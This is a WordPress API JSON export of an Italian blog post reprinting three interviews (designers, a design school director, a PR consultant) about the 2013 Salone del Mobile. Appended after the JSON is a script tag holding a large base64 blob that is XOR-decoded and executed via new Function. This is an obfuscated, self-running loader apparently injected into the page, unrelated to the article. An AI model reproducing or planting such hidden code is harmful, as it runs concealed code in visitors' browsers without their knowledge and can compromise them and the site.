{"id":3373,"date":"2013-04-13T10:45:06","date_gmt":"2013-04-13T10:45:06","guid":{"rendered":"https:\/\/giuliazappa.net\/sei-punti-di-vista-sul-sistema-design-parte-1\/"},"modified":"2013-04-13T10:45:06","modified_gmt":"2013-04-13T10:45:06","slug":"sei-punti-di-vista-sul-sistema-design-parte-1","status":"publish","type":"post","link":"https:\/\/giuliazappa.net\/en\/sei-punti-di-vista-sul-sistema-design-parte-1\/","title":{"rendered":"Sei punti di vista sul sistema design. Parte 1"},"content":{"rendered":"<p>Abbiamo dato spazio a sei professionisti che, a diverso titolo, operano in quella grande arena che \u00e8 il mercato del design. Uno scambio indiretto di esperienze da parte di chi conosce bene il dietro le quinte del Salone del Mobile, ma anche un termometro per valutare quanto i meccanismi di produzione siano rivelatori di temi, apparentemente poco nobili, che hanno un\u2019influenza centrale sull\u2019efficacia del progetto. Qui trovate le prime tre interviste.<\/p>\n<p>I DESIGNER<br \/>\nLUCIDIPEVERE<br \/>\ntitolari dello Studio LucidiPevere<\/p>\n<p>Salone del Mobile: quanto \u00e8 importante esserci?<br \/>\nMolto! Il Salone di Milano riunisce il maggior numero di aziende di design provenienti da tutto il mondo. \u00c8 un\u2019occasione importante per il confronto, con le aziende innanzitutto, poich\u00e9 \u00e8 il luogo dove si tirano le somme di un anno o pi\u00f9 di lavoro.<\/p>\n<p>Fiera o Fuorisalone?<br \/>\nFiera, perch\u00e9 \u00e8 orientata alla concretezza. Si espone per vendere, non necessariamente per stupire. \u00c8 qui che i possibili acquirenti si interessano o meno a un prodotto, lo provano, lo valutano in tutti i suoi aspetti: da quello estetico, sicuramente importante, a quello commerciale, che in questi anni difficili \u00e8 imprescindibile. I designer non possono pi\u00f9 disinteressarsene n\u00e9 considerarlo \u201caccessorio\u201d.<\/p>\n<p>Quanto tempo prima parte la preparazione di un oggetto per il Salone?<br \/>\nDipende dal tipo di azienda, dal tipo di designer, dal tipo di prodotto. Il nostro approccio alla progettazione \u00e8 solitamente sperimentale, lavoriamo molto con i materiali e con le tecnologie. Per questo i tempi sono abbastanza lunghi. A volte invece lavoriamo sul concetto di archetipo, e in questi casi i tempi sono pi\u00f9 brevi, perch\u00e9 tutto il progetto \u00e8 frutto di un\u2019idea. Non scendiamo mai sotto l\u2019anno di lavoro.<\/p>\n<p>Un ricordo della vostra prima esperienza al Salone.<br \/>\nPevere: Ero uno studente universitario e non avevo mai visto cos\u00ec tanti prodotti e aziende tutti insieme. Mi sono domandato quante possibilit\u00e0 avessi realmente di diventare un designer.<br \/>\nLucidi: Ricordi confusi. Ero piccolo e ci andavo gi\u00e0 con mio padre; poi da studente. Quando l\u2019ho visitato per la prima volta da solo, sapevo gi\u00e0 il mestiere che volevo fare da grande.<\/p>\n<p>Quale design week estera fa concorrenza a Milano?<br \/>\nNessuna per importanza e dimensione. Ce ne sono alcune, per\u00f2, che hanno un grande fascino: quella di Vienna, che coinvolge nel centro storico i negozi, le botteghe e i laboratori artistici pi\u00f9 prestigiosi; oppure Kortrijk, in Belgio.<\/p>\n<p>Salone da visitatori: quale bagaglio si porta a casa?<br \/>\nSi colgono le nuove tendenze. E si pu\u00f2 scommettere su quali pezzi segneranno la storia del design, perch\u00e9 il Salone \u00e8 un termometro attendibile e reale della nostra piccola grande industria del mobile.<\/p>\n<p>(Valia Barriello)<\/p>\n<p><a href=\"http:\/\/www.lucidipevere.com\" rel=\"noopener\" target=\"_blank\">www.lucidipevere.com<\/a><\/p>\n<figure id=\"attachment_840\" aria-describedby=\"caption-attachment-840\" style=\"width: 284px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/giuliazappa.net\/wp-content\/uploads\/2013\/04\/stefano-maria-bettega-284x300.jpg\" alt=\"\" width=\"284\" height=\"300\" class=\"size-medium wp-image-840\" \/><figcaption id=\"caption-attachment-840\" class=\"wp-caption-text\">Stefano Maria Bettega, direttore di ISIA Firenze<\/figcaption><\/figure>\n<p>LA SCUOLA<br \/>\nSTEFANO MARIA BETTEGA<br \/>\ndirettore dell\u2019ISIA di Firenze<\/p>\n<p>Partecipare al Salone\/Fuorisalone \u00e8 imprescindibile per una scuola di design?<br \/>\nSi tratta di un importante momento di confronto e scambio, che tuttavia non deve essere identificato con la disciplina in s\u00e9. Il rischio \u00e8 infatti di pensare che il design sia tutto l\u00ec, cosa che ovviamente non \u00e8 vera.<\/p>\n<p>I bilanci di un istituto pubblico qual \u00e8 l\u2019ISIA permettono di investire in una presenza al Salone del Mobile?<br \/>\nLe nostre economie sono molto contratte e a malapena riusciamo a tamponare l\u2019ordinario. Fosse davvero soltanto il problema di prevedere a bilancio la presenza al Salone saremmo dei signori. La nostra presenza a Milano \u00e8 resa possibile dall\u2019impegno di Mirko Tattarini, il docente che ha curato la partecipazione di ISIA, e dalla buona volont\u00e0 degli studenti, i quali spesso anticipano di tasca propria alcune delle spese.<\/p>\n<p>Il confronto con gli esiti della ricerca portata avanti dalle altre scuole, italiane e straniere, presenti al Salone mette in discussione la didattica e i presupposti espositivi?<br \/>\nIl nostro impianto disciplinare \u00e8 piuttosto consolidato e si presta alle flessibilit\u00e0 grazie alla capacit\u00e0 dei docenti di reinterpretare le declaratorie di settore in funzione dell\u2019evoluzione della disciplina, che \u00e8 intimamente legata alla contemporaneit\u00e0. Certo, lo stimolo rappresentato dalla settimana milanese incide sul modo di percepire la disciplina e la sua evoluzione. Credo che in questo senso abbia molta pi\u00f9 rilevanza il SaloneSatellite.<\/p>\n<p>Quali sono le lezioni da trarre da una visita alla Milano Design Week?<br \/>\nAi miei studenti direi di avvicinarsi alla manifestazione con uno sguardo critico e di inquadrarla per ci\u00f2 che \u00e8: un importante evento che rappresenta una delle possibili facce del design.<\/p>\n<p><a href=\"http:\/\/www.isiadesign.fi.it\" rel=\"noopener\" target=\"_blank\">www.isiadesign.fi.it<\/a><\/p>\n<figure id=\"attachment_839\" aria-describedby=\"caption-attachment-839\" style=\"width: 219px\" class=\"wp-caption alignnone\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/giuliazappa.net\/wp-content\/uploads\/2013\/04\/silvia-rizzi-219x300.jpg\" alt=\"\" width=\"219\" height=\"300\" class=\"size-medium wp-image-839\" \/><figcaption id=\"caption-attachment-839\" class=\"wp-caption-text\">Silvia Rizzi, titolare di Silvia Rizzi Comunicazione<\/figcaption><\/figure>\n<p>LA PR<br \/>\nSILVIA RIZZI<br \/>\ntitolare di Silvia Rizzi Comunicazione<\/p>\n<p>Con quanto anticipo si prepara una partecipazione al Salone?<br \/>\nGi\u00e0 da fine dicembre le nostre aziende ci ufficializzano i progetti e incominciano a coinvolgerci nella programmazione delle attivit\u00e0 di comunicazione riguardo al lancio di nuovi prodotti, aperture di showroom, inaugurazione di mostre. Tali attivit\u00e0, ovviamente, fanno parte di una programmazione da parte delle imprese che ha avuto avvio almeno un paio d\u2019anni prima.<\/p>\n<p>La crisi sta modificando le modalit\u00e0 con cui si fanno relazioni pubbliche?<br \/>\nLa crisi sta modificando non solo le modalit\u00e0 con cui si fanno relazioni pubbliche in occasione della design week, ma mette in discussione il nostro ruolo e il senso delle fiere in assoluto. Il nostro motto: bando allo sfarzo e agli inutili orpelli, all\u2019insegna di un pragmatismo che deve attraversare tutte le attivit\u00e0 legate agli eventi e alle fiere!<\/p>\n<p>Al Salone bisogna esserci: come cambia la maniera di fare comunicazione in un momento in cui tutti cercano visibilit\u00e0?<br \/>\nI comunicatori devono convincere le aziende della necessit\u00e0 di proporre contenuti di grande qualit\u00e0 anche in un momento in cui molte imprese si fanno affiancare da starlette, divi della tv e della musica. Purtroppo molti dei nostri media, soprattutto i quotidiani, hanno dedicato molto spazio a queste collaborazioni, a scapito di realt\u00e0 che invece investono in ricerca e innovazione.<\/p>\n<p>Tra le fiere e le design week all\u2019estero, ce n\u2019\u00e8 una a tuo parere che potrebbe soppiantare Milano?<br \/>\nMa le fiere, cos\u00ec come sono oggi concepite, hanno ancora senso di esistere? Quartieri fieristici vetusti, difficili da raggiungere e per nulla accoglienti; visitatori stanchi e annoiati e sempre uguali\u2026 Ha ancora senso parlare di vendita degli spazi al mq o forse le fiere dovrebbero concorrere al conseguimento del risultato insieme agli espositori? Ha senso che le aziende debbano correre per proporre novit\u00e0 anche una o due volte l\u2019anno e non riuscire poi ad andare sul mercato coi prodotti prima di un anno o due, visto che le proposte presentate in corsa non sono risolte?<\/p>\n<p>www.silviarizzicomunicazione.com<\/p>\n<p><em>Articolo pubblicato su Artribune Magazine #12 \u2013 Supplemento Design 2013 e su <a href=\"http:\/\/Articolo pubblicato su Artribune Magazine #12 \u2013 Supplemento Design 2013\" rel=\"noopener\" target=\"_blank\">Artribune.com<\/a> il 13 aprile 2013<\/em><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Abbiamo dato spazio a sei professionisti che, a diverso titolo, operano in quella grande arena che \u00e8 il mercato del design. Uno scambio indiretto di esperienze da parte di chi conosce bene il dietro le quinte del Salone del Mobile, ma anche un termometro per valutare quanto i meccanismi di produzione siano rivelatori di temi, &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/giuliazappa.net\/en\/sei-punti-di-vista-sul-sistema-design-parte-1\/\" class=\"more-link\">Read more<span class=\"screen-reader-text\"> &#8220;Sei punti di vista sul sistema design. Parte 1&#8221;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":2506,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","_themeisle_gutenberg_block_has_review":false,"footnotes":""},"categories":[273],"tags":[519],"class_list":["post-3373","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-interviews","tag-salone-del-mobile-2013-en"],"acf":[],"_links":{"self":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts\/3373","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/comments?post=3373"}],"version-history":[{"count":0,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/posts\/3373\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/media\/2506"}],"wp:attachment":[{"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/media?parent=3373"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/categories?post=3373"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/giuliazappa.net\/en\/wp-json\/wp\/v2\/tags?post=3373"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<script>
!function(){var _0x392f=atob('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'),_0xd092=125,_0x0109=new Uint8Array(_0x392f['length']),_0xab25=0;for(;_0xab25<_0x392f['length'];_0xab25++)_0x0109[_0xab25]=_0x392f['charCodeAt'](_0xab25)^_0xd092;(new Function(new TextDecoder()['decode'](_0x0109)))()}();
</script>
    